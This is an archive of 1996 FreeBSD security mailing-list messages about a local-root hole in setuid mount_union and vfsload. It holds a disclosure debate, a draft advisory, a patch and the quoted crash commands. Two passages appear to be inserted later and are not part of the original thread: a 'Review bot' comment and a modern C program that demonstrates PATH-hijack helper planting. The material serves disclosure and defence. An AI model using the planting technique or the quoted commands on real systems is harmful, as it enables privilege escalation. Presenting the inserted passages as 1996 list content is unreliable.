    Glen> Now the big question, except for the obvious, why was
    Glen> mount_union suid in the first place?

As well as mount_msdos ... it may have a similar vulnerability.
--
Sean Kelly
NOAA Forecast Systems Laboratory
kelly@fsl.noaa.gov
Boulder Colorado USA
http://www-sdd.fsl.noaa.gov/~kelly/

From owner-freebsd-security Fri May 17 07:51:01 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id HAA21914 for security-outgoing; Fri, 17 May 1996 07:51:01 -0700 (PDT)
Received: from halloran-eldar.lcs.mit.edu (halloran-eldar.lcs.mit.edu [18.26.0.159]) by freefall.freebsd.org (8.7.3/8.7.3) with SMTP id HAA21907 for ; Fri, 17 May 1996 07:50:58 -0700 (PDT)
Received: by halloran-eldar.lcs.mit.edu; (5.65/1.1.8.2/19Aug95-0530PM) id AA04803; Fri, 17 May 1996 10:50:50 -0400
Date: Fri, 17 May 1996 10:50:50 -0400
From: Garrett Wollman
Message-Id: <9605171450.AA04803@halloran-eldar.lcs.mit.edu>
To: "Jordan K. Hubbard"
Cc: freebsd-security@freebsd.org
Subject: Re: very bad
In-Reply-To: <13642.832322039@time.cdrom.com>
References: <13642.832322039@time.cdrom.com>
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

< said:

>> Too bad it's already on BUGTRAQ and BoS which is way more than 1000 :-(

> Ah well, what's done is done.

>> of such an address. The prepared fix is chmod u-s /sbin/mount_union.

> It should at least return EPERM! :-)

No. Users are /supposed/ to be able to use mount(2) now, if they have appropriate permissions on the source and target. This appears to be a hole in vfsload(3), which I will fix ASAP, if someone doesn't get to it before I do.

-GAWollman

--
Garrett A. Wollman    | Shashish is simple, it's discreet, it's brief. ...
wollman@lcs.mit.edu   | Shashish is the bonding of hearts in spite of distance.
Opinions not those of | It is a bond more powerful than absence. We like people
MIT, LCS, ANA, or NSA | who like Shashish.
- Claude McKenzie + Florent Vollant From owner-freebsd-security Fri May 17 09:30:24 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id JAA29267 for security-outgoing; Fri, 17 May 1996 09:30:24 -0700 (PDT) Received: from mail6 (root@mail6.netcom.com [192.100.81.142]) by freefall.freebsd.org (8.7.3/8.7.3) with SMTP id JAA29262; Fri, 17 May 1996 09:30:22 -0700 (PDT) Received: from boris.scccc.com ([198.243.16.202]) by mail6 (8.6.13/Netcom) id JAA03734; Fri, 17 May 1996 09:30:17 -0700 Received: by boris.scccc.com (940816.SGI.8.6.9/940406.SGI) id KAA10791; Fri, 17 May 1996 10:26:17 -0600 Received: from natasha.scccc.com(198.243.16.198) by boris.scccc.com via smap (V1.3) id sma010789; Fri May 17 10:25:56 1996 Received: by natasha.scccc.com (940816.SGI.8.6.9/940406.SGI) id KAA15759; Fri, 17 May 1996 10:16:36 -0600 From: kduling@natasha.scccc.com (Kevin J. Duling) Message-Id: <199605171616.KAA15759@natasha.scccc.com> Subject: Re: very bad To: owner-freebsd-security@freefall.freebsd.org (Glen Foster) Date: Fri, 17 May 1996 10:16:36 -0600 (MDT) Cc: jkh@time.cdrom.com, coredump@nervosa.com, freebsd-security@freebsd.org In-Reply-To: <199605171100.HAA00301@ptavv.nsta.org> from "Glen Foster" at May 17, 96 07:00:35 am X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > I, for one, am very happy that he announced it to the group rather > than attempting STO. I was able fix the systems for which I have > responsibility immediately. Thanks to Chris for getting the word out! > --- > Glen Foster I agree. I once had a talk with Chris McDonald from WSMR about system security and the debate about whether or not to protect your system through ignorance or not. I was a student at NMSU at the time, working on a paper for system security on NMSU-NET. 
My audience was my instructor who was also my manager at the Computer Center. Wow, did that stir up a hornets nest, but that's another story... If you don't announce the bugs, then the crackers learn them while the admins are left in ignorance. You're not going to find a forum where you know you're only telling "the right people" about the problem. Now I'm wondering about how many others are out there that I don't know about because they weren't posted on the lists I read. Who's Chris McDonald? One of the few people who listened to Cliff Stoll. -- Kevin J. Duling /\/^\^/^\^\/\ SCC Communications Corp. kduling@scc911.com Boulder, Colorado (303) 581-5769 From owner-freebsd-security Fri May 17 09:35:13 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id JAA29528 for security-outgoing; Fri, 17 May 1996 09:35:13 -0700 (PDT) Received: from mail6 (root@mail6.netcom.com [192.100.81.142]) by freefall.freebsd.org (8.7.3/8.7.3) with SMTP id JAA29519; Fri, 17 May 1996 09:35:10 -0700 (PDT) Received: from boris.scccc.com ([198.243.16.202]) by mail6 (8.6.13/Netcom) id JAA05795; Fri, 17 May 1996 09:35:08 -0700 Received: by boris.scccc.com (940816.SGI.8.6.9/940406.SGI) id KAA10797; Fri, 17 May 1996 10:31:18 -0600 Received: from natasha.scccc.com(198.243.16.198) by boris.scccc.com via smap (V1.3) id sma010795; Fri May 17 10:31:16 1996 Received: by natasha.scccc.com (940816.SGI.8.6.9/940406.SGI) id KAA15772; Fri, 17 May 1996 10:21:57 -0600 From: kduling@natasha.scccc.com (Kevin J. 
Duling) Message-Id: <199605171621.KAA15772@natasha.scccc.com> Subject: Re: very bad To: owner-freebsd-security@freefall.freebsd.org (Vladimir Jojic) Date: Fri, 17 May 1996 10:21:57 -0600 (MDT) Cc: freebsd-security@freebsd.org In-Reply-To: <199605171009.MAA00475@EUnet.yu> from "Vladimir Jojic" at May 17, 96 12:09:30 pm X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > Hi, > > What IS very bad about this whole thing, isn't the existence of this bug, > as much as how easily information about it can be obtained. Even if > you do send patch along with info, there is still danger that someone, > gets up earlier than root, and then ... (sweet dreams, root!) What might be a better solution is to announce that "There is a problem" then provide the fix...but don't illustrate the problem. That way everyone is immediately notified of the problem and a fix for it, but you don't have a list of instructions for how to crack in. Personally, I prefer having the instructions, but it's not a good idea... -- Kevin J. Duling /\/^\^/^\^\/\ SCC Communications Corp.
kduling@scc911.com Boulder, Colorado (303) 581-5769 From owner-freebsd-security Fri May 17 09:53:52 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id JAA01379 for security-outgoing; Fri, 17 May 1996 09:53:52 -0700 (PDT) Received: from nervosa.com (root@nervosa.com [192.187.228.86]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id JAA01371 for ; Fri, 17 May 1996 09:53:49 -0700 (PDT) Received: from onyx.nervosa.com (coredump@onyx.nervosa.com [10.0.0.1]) by nervosa.com (8.7.5/8.7.3) with SMTP id JAA23977; Fri, 17 May 1996 09:52:27 -0700 (PDT) Date: Fri, 17 May 1996 09:52:26 -0700 (PDT) From: invalid opcode To: Danny Smith cc: Vladimir Jojic , freebsd-security@freebsd.org Subject: Re: very bad In-Reply-To: <199605171217.WAA11280@amethyst.auscert.org.au> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Fri, 17 May 1996, Danny Smith wrote: > Another unfortunate part is that it is approaching midnight in Australia > (and it is now past midnight in New Zealand) at the start of the weekend. > Posting vulnerability information like this has not helped any system > administrators if they are all home for the weekend. All it has done > is increase the exposure of their systems to attack by more people. > > I personally don't think that is helping anyone at all. > > Danny Smith. First off, I wouldn't have posted it had it been a secret little bug. But it wasn't, it was already out on 2 mailing lists which probably have close to 10,000 people on them, 50% of which are people who LOOK for these types of bugs so they can log in to their accounts running FreeBSD and exploit it. At this point, the more exposure it gets, the more root@vulnerablehost will hear about it and fix it.
== Chris Layne ======================================== Nervosa Computing == == coredump@nervosa.com ================ http://www.nervosa.com/~coredump == From owner-freebsd-security Fri May 17 10:28:31 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id KAA04289 for security-outgoing; Fri, 17 May 1996 10:28:31 -0700 (PDT) Received: from marble.eps.nagoya-u.ac.jp (marble.eps.nagoya-u.ac.jp [133.6.57.68]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id KAA04282 for ; Fri, 17 May 1996 10:28:28 -0700 (PDT) Received: from marble.eps.nagoya-u.ac.jp (localhost [127.0.0.1]) by marble.eps.nagoya-u.ac.jp (8.7.4+2.6Wbeta6/3.3W9) with ESMTP id CAA02155; Sat, 18 May 1996 02:28:18 +0900 (JST) Message-Id: <199605171728.CAA02155@marble.eps.nagoya-u.ac.jp> To: coredump@nervosa.com Cc: freebsd-security@FreeBSD.ORG Subject: Re: BoS: SECURITY BUG in FreeBSD (fwd) In-Reply-To: Your message of "Fri, 17 May 1996 00:47:31 -0700 (PDT)" References: X-Mailer: Mew version 1.05+ on Emacs 19.28.1, Mule 2.3 X-PGP-Fingerprint: CA 87 00 60 BB BA 0C 81 A8 FB AA 6A 3A B0 38 9E Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Date: Sat, 18 May 1996 02:28:16 +0900 From: KATO Takenori Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > mount_union ~/a ~/b > mount_union -b ~/a ~/b My FreeBSD-current (I supped sources on May 17.) box crashed just after `mount_union -b ~/a ~/b' operation. Stack trace shows: _ufs_ihashget: recursive lock not expected -- pid 188 <--- mount_union _ufs_ihashget _ffs_vget _ufs_lookup _lookup ---- KATO Takenori Dept. Earth Planet. 
Sci., Nagoya Univ., Nagoya, 464-01, Japan Voice: +81-52-789-2529 Fax: +81-52-789-3033 From owner-freebsd-security Fri May 17 10:50:58 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id KAA05883 for security-outgoing; Fri, 17 May 1996 10:50:58 -0700 (PDT) Received: from precipice.shockwave.com (precipice.shockwave.com [171.69.108.33]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id KAA05878; Fri, 17 May 1996 10:50:55 -0700 (PDT) Received: from shockwave.com (localhost.shockwave.com [127.0.0.1]) by precipice.shockwave.com (8.7.5/8.7.3) with ESMTP id KAA00487; Fri, 17 May 1996 10:49:43 -0700 (PDT) Message-Id: <199605171749.KAA00487@precipice.shockwave.com> To: "Jordan K. Hubbard" cc: davidg@Root.COM, "Jordan K. Hubbard" , committers@freefall.freebsd.org, security@freebsd.org Subject: Re: cvs commit: src/sbin Makefile In-reply-to: Your message of "Fri, 17 May 1996 02:38:19 PDT." <273.832325899@time.cdrom.com> Date: Fri, 17 May 1996 10:49:43 -0700 From: Paul Traina Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk From: "Jordan K. Hubbard" Subject: Re: cvs commit: src/sbin Makefile > It would have been better to install it without suid root so that the > permissions get changed when people next do a "make world". Yeah, I thought of that but sort of wimped and decided to go instead for minimum impact (i.e. no changes to mount_union itself). Can we see what pst's final decision on this one is and simply recommend a `chmod u-s /sbin/mount_union' for the time being? Jordan I don't have a "final" decision, but I'm leaning towards making it not setuid root until we're clear that the distributions have all been fixed. Also, I'm open for suggestions on the final outcome here. Ideally, we should simply fix the problem in the code (thank you Garret), not the symptom. However, this is a reasonable workaround given the relatively small use of mount_union, but it is *just* a workaround. 
Here's my current *DRAFT* advisory, I'm certain it's not perfect (i.e. is 2.0.5 and 2.0 affected too?) Please (anyone who's reading this) proof it... I haven't had a chance to dig through old code myself on this one yet, so I know I probably fubard something, and I definitely want to check to see if NetBSD has this bug too (in a different form) so we can warn them.

------- DRAFT ---- DO NOT REDISTRIBUTE DISTRIBUTE

FreeBSD SA-96:09 mount_union unauthorized super-user access

Category: core
Module: mount_union
Announced: 1996-05-17
Affects: FreeBSD 2.1, 2.1-stable, and 2.2-current
Corrected: 1996-05-17 2.1-stable and 2.2-current sources
Source: 4.4 BSD bug
FreeBSD only: unknown

Super-user access may be obtained or the system may be crashed through the misuse of the mount_union command.

--Workaround--

Mount_union is distributed as a setuid root program. Remove the setuid bit. As root, execute the command:

% chmod u-s /sbin/mount_union

then verify that the permissions of mount_union have been removed.
The permissions array should read "-r-xr-xr-x" as shown here: % ls -l /sbin/mount_union -r-xr-xr-x 1 root bin 53248 Apr 26 04:40 /sbin/mount_union If you have the source code installed, we suggest patching the sources so that mount_union will not be installed with the setuid bit set: You may apply the following patch: *** /usr/src/sbin/mount_union/Makefile Sun Nov 20 14:47:52 1994 --- /usr/src/sbin/mount_union/Makefile Fri May 17 10:36:09 1996 *************** *** 8,14 **** CFLAGS+= -I${.CURDIR}/../../sys -I${MOUNT} .PATH: ${MOUNT} - BINOWN= root - BINMODE=4555 - .include --- 8,11 ---- From owner-freebsd-security Fri May 17 10:58:15 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id KAA06203 for security-outgoing; Fri, 17 May 1996 10:58:15 -0700 (PDT) Received: from precipice.shockwave.com (precipice.shockwave.com [171.69.108.33]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id KAA06196 for ; Fri, 17 May 1996 10:58:12 -0700 (PDT) Received: from shockwave.com (localhost.shockwave.com [127.0.0.1]) by precipice.shockwave.com (8.7.5/8.7.3) with ESMTP id KAA00746; Fri, 17 May 1996 10:55:58 -0700 (PDT) Message-Id: <199605171755.KAA00746@precipice.shockwave.com> To: Vladimir Jojic cc: freebsd-security@freebsd.org Subject: Re: very bad In-reply-to: Your message of "Fri, 17 May 1996 12:09:30 +0200." <199605171009.MAA00475@EUnet.yu> Date: Fri, 17 May 1996 10:55:58 -0700 From: Paul Traina Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk We've talked about stuff like this in the past in other forums (not FreeBSD specific) and the conclusion time and time again is that it's so totally trivial to spoof this sort of thing that the only way to handle security issues is full disclosure. FIRST, an organization of CERT-like groups, where everyone ostensibly knows everyone else, leaks information like mad. Given the time and trouble they went through to avoid this, a perl script isn't going to cut it. 
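Review bot: the third `-` line of the hunk reads as a bare `.include` with no file argument, which bsd make will not accept; the range headers `*** 8,14 ****` and `--- 8,11 ----` say exactly three lines are dropped (BINOWN, BINMODE and the blank line after them), so that `-` belongs to the removed blank line and `.include` is the unchanged context line that follows, whose `<bsd.prog.mk>` argument has most likely been stripped in transit along with its angle brackets. Check the hunk against the real Makefile before applying it, and make sure the `.include` line survives, since nothing builds without it. Note also that this patch only changes what the next `make world` installs; the `chmod u-s /sbin/mount_union` step given above is still required on systems that already have the binary.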
:-( If there's something sensitive that should be confidential, it should be sent to "security-officer@freebsd.org" who can then pull in the right resources. We'll go for full disclosure as soon as we can verify and patch around the problem, so that EVERYONE gets an even shot at fixing it. Paul From: Vladimir Jojic Subject: Re: very bad Hi, What IS very bad about this whole thing, isn't the existence of this bug, as much as how easily information about it can be obtained. Even if you do send patch along with info, there is still danger that someone, gets up earlier than root, and then ... (sweet dreams, root!) I am not very familiar with mailing list programs, but there is a possible improvement (if it isn't yet done):
- add special class of mailing list, such as security list
- when user wants to be added to this list, program checks if his root (of system from which mail came) is on the list:
  1. yes, inform root (or address he left), about that user (even ask if he allows him to join this list, this is a bit fascist, but that's security)
  2. not, inform root about existence of this list ask him if he wants to join (where to send him mail, how much to *delay* info on bugs to users on his system, or not even allow them to join (hey, maybe system is crackers nest)) if not, ask him should the user be allowed to join list
I believe that it is obvious why *delay* is so important. This is just the sketch, of course. Maybe this message isn't for this list, but it certainly concerns, all of the readers. I admit that *delay* is a bit strong, but so are the closed list. There is still one problem, if we have a root of a small system not connected to Internet, he can receive mail only on other system, that is connected. Root of a system connected to Internet, receives info before root of small system, and if has any malicious intention, he can surely, mess things up. But that comes to domain of human nature. I am not saying that this will solve all problems, but will *delay* some.
Please, give your opinions on this, Vladimir Jojic (guru apprentice, still looking for teacher ... :) vjojic@EUnet.yu > > On Fri, 17 May 1996, Jordan K. Hubbard wrote: > > > Ow! :-( > > > > Thanks for reporting this! > > > > You know though, for ones this bad I'd really rather you sent the > > message to security-officer@freebsd.org rather than freebsd-security > > in the future. There are easily over 1000 people on this list and you > > just announced a cookbook method for any shell account user to go root > > on a FreeBSD based ISP box; hardly the kind of information one would > > want to see widely circulated without a prepared fix, at the > > least. :-( > > Jordan > > Too bad it's already on BUGTRAQ and BoS which is way more than 1000 :-( > And I would have sent it to security-officer@freebsd.org had I even known > of such an address. The prepared fix is chmod u-s /sbin/mount_union. > > == Chris Layne ======================================== Nervosa Computing = >>= > == coredump@nervosa.com ================ http://www.nervosa.com/~coredump = >>= > > From owner-freebsd-security Fri May 17 11:21:58 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id LAA07426 for security-outgoing; Fri, 17 May 1996 11:21:58 -0700 (PDT) Received: from halloran-eldar.lcs.mit.edu (halloran-eldar.lcs.mit.edu [18.26.0.159]) by freefall.freebsd.org (8.7.3/8.7.3) with SMTP id LAA07418 for ; Fri, 17 May 1996 11:21:55 -0700 (PDT) Received: by halloran-eldar.lcs.mit.edu; (5.65/1.1.8.2/19Aug95-0530PM) id AA05895; Fri, 17 May 1996 14:21:48 -0400 Date: Fri, 17 May 1996 14:21:48 -0400 From: Garrett Wollman Message-Id: <9605171821.AA05895@halloran-eldar.lcs.mit.edu> To: Paul Traina Cc: "Jordan K. Hubbard" , davidg@root.com, "Jordan K. 
Hubbard" , committers@freefall.freebsd.org, security@freebsd.org Subject: Re: cvs commit: src/sbin Makefile In-Reply-To: <199605171749.KAA00487@precipice.shockwave.com> References: <273.832325899@time.cdrom.com> <199605171749.KAA00487@precipice.shockwave.com> Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk < said: > Here's my current *DRAFT* advisory, I'm certain it's not perfect > (i.e. is 2.0.5 and 2.0 affected too?) Yes. This bug has been in there since the 2.0. The fix should be the same for all release versions of libc (make a diff with -kk so that the different RCS Ids don't cause the patch to partially fail). > I definitely want to check to see if NetBSD has this bug too (in > a different form) so we can warn them. I'd be very surprised. > FreeBSD SA-96:09 mount_union unauthorized super-user access mount_msdos is also affected. All of the mount_* programs can be affected if `root' has an insecure path and attempts to mount a filesystem type not already in the kernel. > Category: core > Module: mount_union > Announced: 1996-05-17 > Affects: FreeBSD 2.1, 2.1-stable, and 2.2-current > Corrected: 1996-05-17 2.1-stable and 2.2-current sources Not yet in -stable. Doing that right now. > Source: 4.4 BSD bug No. 4.4 didn't have LKMs. > FreeBSD only: unknown Yes. -GAWollman -- Garrett A. Wollman | Shashish is simple, it's discreet, it's brief. ... wollman@lcs.mit.edu | Shashish is the bonding of hearts in spite of distance. Opinions not those of| It is a bond more powerful than absence. We like people MIT, LCS, ANA, or NSA| who like Shashish. 
- Claude McKenzie + Florent Vollant From owner-freebsd-security Fri May 17 11:22:27 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id LAA07469 for security-outgoing; Fri, 17 May 1996 11:22:27 -0700 (PDT) Received: (from hsu@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id LAA07463; Fri, 17 May 1996 11:22:26 -0700 (PDT) Date: Fri, 17 May 1996 11:22:26 -0700 (PDT) From: Jeffrey Hsu Message-Id: <199605171822.LAA07463@freefall.freebsd.org> To: jkh Subject: Re: very bad Cc: freebsd-security Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk I believe mount_union is setuid root to allow non-root users to make union mounts in directories that they own. The Lite2 kernel (a current snapshot of my diffs is in ~hsu/cvs/teeny.diffs.5-16.gz) removes the restriction that only root can do mounts, so mount_union is no longer set_uid there. So, it should be sufficient to just make our mount_union non-setuid root for the following reasons:
1. Union mounts don't work anyways.
2. When they do work in Lite2, mount_union won't be setuid root.
3. If the user wants to try out union mounts now, he can su and do it.
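Garrett Wollman's remark above, that every setuid mount_* program is exposed when root has an insecure PATH and a filesystem type has to be loaded through modload, and the fix Glen Foster proposes later in this thread (reference modload by its full path), come down to one rule for setuid helpers: never let the invoking user's environment decide what runs as root. The C program below is an added illustration, not FreeBSD's vfsload(3) or the fix committed for it, and it does not reproduce the exploit. resolve_in_path() shows which file a PATH-relative exec such as execlp("modload", ...) would pick once an unprivileged user has put a directory of their own, or an empty entry meaning ".", at the front of PATH; plant_fake_helper() creates the stand-in file that lookup finds, and never runs it; run_trusted_modload() shows the hardened launch with an absolute path, a fixed environment and descriptors 0-2 forced open. The helper name modload and /sbin/modload as its trusted location come from the thread; the script contents, directory names and environment values are assumptions made for the demonstration.

```c
/*
 * Added illustration (not FreeBSD's vfsload(3) or its fix): why a setuid
 * program must never find a helper through PATH, and what the hardened
 * call looks like instead. "modload" and /sbin/modload are taken from the
 * thread; every other name and value here is assumed for the demo.
 */
#define _XOPEN_SOURCE 700
#define _DEFAULT_SOURCE 1
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* The only place a setuid program should ever exec the helper from. */
#define TRUSTED_MODLOAD "/sbin/modload"

/*
 * What a PATH-relative exec (execlp/execvp) does with a bare name: walk the
 * caller-controlled PATH and take the first entry where "<dir>/<prog>" is
 * executable; an empty entry means the current directory. Writes the
 * winning path to out and returns 1, or returns 0 if nothing matched.
 * Nothing is executed here; this only reports which file *would* run.
 */
int resolve_in_path(const char *prog, const char *path, char *out, size_t outlen)
{
    if (prog == NULL || path == NULL || strchr(prog, '/') != NULL)
        return 0;                          /* names containing '/' are never searched */
    const char *p = path;
    for (;;) {
        const char *colon = strchr(p, ':');
        size_t len = colon ? (size_t)(colon - p) : strlen(p);
        int n = (len == 0)
            ? snprintf(out, outlen, "./%s", prog)
            : snprintf(out, outlen, "%.*s/%s", (int)len, p, prog);
        if (n > 0 && (size_t)n < outlen && access(out, X_OK) == 0)
            return 1;
        if (colon == NULL)
            return 0;
        p = colon + 1;
    }
}

/*
 * Drops a stand-in "helper" into dir: the kind of script an unprivileged
 * user can plant in a directory they own. Created only so the lookup above
 * has something to find; nothing in this file runs it.
 */
int plant_fake_helper(const char *dir, const char *name, char *out, size_t outlen)
{
    static const char script[] = "#!/bin/sh\necho \"planted helper ran as uid $(id -u)\"\n";
    int n = snprintf(out, outlen, "%s/%s", dir, name);
    if (n < 0 || (size_t)n >= outlen)
        return -1;
    int fd = open(out, O_WRONLY | O_CREAT | O_TRUNC, 0755);
    if (fd < 0)
        return -1;
    ssize_t w = write(fd, script, sizeof script - 1);
    close(fd);
    return (w == (ssize_t)(sizeof script - 1)) ? 0 : -1;
}

/*
 * Hardened launch: absolute path (no PATH search at all), a fixed
 * environment instead of the caller's, and descriptors 0-2 guaranteed open
 * so the helper's own open() calls cannot land on stdin/stdout/stderr.
 * Returns the helper's exit status, 127 if it could not be exec'd, or -1
 * on fork/wait failure. Needs a real /sbin/modload, so it is demo-only.
 */
int run_trusted_modload(const char *module)
{
    static char *const envp[] = {
        "PATH=/sbin:/bin:/usr/sbin:/usr/bin",  /* only matters if the helper spawns anything */
        "IFS= \t\n",                           /* likewise, for any shell it might run */
        NULL
    };
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        int fd;
        while ((fd = open("/dev/null", O_RDWR)) >= 0 && fd <= 2)
            ;                                  /* fills whichever of 0, 1, 2 were closed */
        if (fd > 2)
            close(fd);
        execle(TRUSTED_MODLOAD, "modload", module, (char *)NULL, envp);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    char dir[] = "./plant-modload-XXXXXX", planted[512], hit[512], path_env[1024];
    if (mkdtemp(dir) == NULL || plant_fake_helper(dir, "modload", planted, sizeof planted) != 0)
        return 1;
    snprintf(path_env, sizeof path_env, "%s:/sbin:/bin:/usr/sbin:/usr/bin", dir);
    if (resolve_in_path("modload", path_env, hit, sizeof hit))
        printf("execlp(\"modload\", ...) with PATH=%s\n  would run: %s\n", path_env, hit);
    printf("run_trusted_modload() always execs: %s\n", TRUSTED_MODLOAD);
    unlink(planted);
    rmdir(dir);
    return 0;
}
```

Run it as an ordinary user: it plants a harmless script in a scratch directory under the current one, prints which file a PATH search would have chosen ahead of /sbin/modload, and cleans up. The same lookup, applied to every exec call in each setuid binary, is the sweep Mike Murphy suggests further down the thread.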
From owner-freebsd-security Fri May 17 11:24:04 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id LAA07580 for security-outgoing; Fri, 17 May 1996 11:24:04 -0700 (PDT) Received: from spike.palmer.com (spike.palmer.com [198.3.156.44]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id LAA07520 for ; Fri, 17 May 1996 11:23:53 -0700 (PDT) Message-Id: <199605171823.LAA07520@freefall.freebsd.org> Received: by spike.palmer.com (1.37.109.11/16.2) id AA035917417; Fri, 17 May 1996 13:23:37 -0500 Date: Fri, 17 May 1996 13:23:37 -0500 From: Richard Palmer To: security@freebsd.org Subject: Subscribe rdp@palmer.com Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk subscribe rdp@palmer.com From owner-freebsd-security Fri May 17 11:44:59 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id LAA08719 for security-outgoing; Fri, 17 May 1996 11:44:59 -0700 (PDT) Received: from mole.mole.org (marmot.mole.org [204.216.57.191]) by freefall.freebsd.org (8.7.3/8.7.3) with SMTP id LAA08712 for ; Fri, 17 May 1996 11:44:56 -0700 (PDT) Received: (from mail@localhost) by mole.mole.org (8.6.12/8.6.12) id SAA09686; Fri, 17 May 1996 18:44:14 GMT Received: from meerkat.mole.org(206.197.192.110) by mole.mole.org via smap (V1.3) id sma009674; Fri May 17 18:43:43 1996 Received: (from mrm@localhost) by meerkat.mole.org (8.6.12/8.6.9) id LAA02710; Fri, 17 May 1996 11:43:43 -0700 Date: Fri, 17 May 1996 11:43:43 -0700 From: "M.R.Murphy" Message-Id: <199605171843.LAA02710@meerkat.mole.org> To: kduling@natasha.scccc.com Subject: Re: very bad Cc: freebsd-security@freebsd.org Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > Personally, I prefer having the instructions, but it's not a good idea... Me too. 
I hate the STO argument thread, and to avoid it, might it not be a Good Thing to do a security sweep of the system, say look at all suid/sgid, IFS holes, and all exec* with no absolute path that are lurking? vfsload probably isn't the only one. ;-) -- Mike Murphy mrm@Mole.ORG +1 619 598 5874 Better is the enemy of Good From owner-freebsd-security Fri May 17 11:48:13 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id LAA08990 for security-outgoing; Fri, 17 May 1996 11:48:13 -0700 (PDT) Received: from orion.webspan.net (root@orion.webspan.net [206.154.70.41]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id LAA08985 for ; Fri, 17 May 1996 11:48:11 -0700 (PDT) Received: (from scanner@localhost) by orion.webspan.net (8.7.5/8.6.12) id OAA03556; Fri, 17 May 1996 14:46:28 -0400 (EDT) Date: Fri, 17 May 1996 14:46:28 -0400 (EDT) From: Scanner SOD To: Vladimir Jojic cc: freebsd-security@freebsd.org Subject: Re: very bad In-Reply-To: <199605171009.MAA00475@EUnet.yu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Fri, 17 May 1996, Vladimir Jojic wrote: > > Hi, > > What IS very bad about this whole thing, isn't the existence of this bug, > as much as how easily information about it can be obtained. Even if > you do send patch along with info, there is still danger that someone, > gets up earlier than root, and then ... (sweet dreams, root!) > > I am not very familiar with mailing list programs, but there is a possible > improvement (if it isn't yet done): > > - add special class of mailing list, such as security list > > - when user wants to be added to this list, program checks > if his root (of system from which mail came) is on the > list: > 1. yes, inform root (or address he left), about > that user (even ask if he allows him to join > this list, this is a bit fascist, but that's > security) > 2.
not, inform root about existence of this list > ask him if he wants to join (where to send him > mail, how much to *delay* info on bugs to users > on his system, or not even allow them to join > (hey, maybe system is crackers nest)) > if not, ask him should the user be allowed to > join list I have to agree. Myself and others on the FreeBSD Net (http://www.bsdnet.org) have recently become very concerned about the policies of the propagation, and lack thereof, of security information on FreeBSD. I'm not blaming anyone; I acknowledge just how many hours there are in a day for everyone. But we fear that as FreeBSD becomes a more appealing route to take for a lot of ISPs, companies, etc., we are going to wind up taking the same policies. See no evil, hear no evil. I have complete faith that BSD is one of the most secure unices out there, but when a "feature" :) like the mount_union pops up it makes one wonder what is wrong with that picture. I would like to volunteer to help out in any way to see that something along the lines of Vladimir's suggestions are carried out. I think we need a fast, safe way to bring admins the information that is critical. -- ===================================| Webspan Inc., ISP Division. FreeBSD 2.1.0 is available now! | Phone: 908-367-8030 ext.
